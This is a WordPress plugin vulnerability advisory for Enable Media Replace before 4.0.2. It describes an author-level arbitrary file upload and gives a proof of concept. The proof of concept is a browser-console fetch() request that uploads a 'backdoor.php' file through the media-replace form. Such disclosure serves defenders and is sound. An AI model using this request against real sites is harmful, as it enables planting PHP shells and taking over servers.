WordPress Plugin Vulnerabilities
Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload
Description
The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.
Proof of Concept
1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php 2) Press on the new picture's thumbnail to see the attachment's details 3) Click on "Upload a new file", next to "Replace media" 4) Paste the following in your browser's developer console: ``` await fetch(document.forms[0].action, { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Content-Type": "multipart/form-data; boundary=---------------------------294159958331225347843177109147", "Upgrade-Insecure-Requests": "1" }, "body": `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"ID\"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"backdoor.php\"\r\nContent-Type: text/php\r\n\r\n<?php phpinfo();\n\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"remove_bg\"\r\n\r\nyes\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"replace_type\"\r\n\r\nreplace_and_search\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"timestamp_replace\"\r\n\r\n2\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date\"\r\n\r\nJanuary 12, 2023\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_hour\"\r\n\r\n18\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_minute\"\r\n\r\n41\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date_formatted\"\r\n\r\n2023-01-12\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"location_dir\"\r\n\r\n2023/01\r\n-----------------------------294159958331225347843177109147--\r\n`, "method": "POST", "mode": "cors" }); ``` 5) Check the wp-content/uploads/2023/01 directory for the backdoor.php file.
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-01-17 (about 1 years ago)
Added
2023-01-17 (about 1 years ago)
Last Updated
2023-01-17 (about 1 years ago)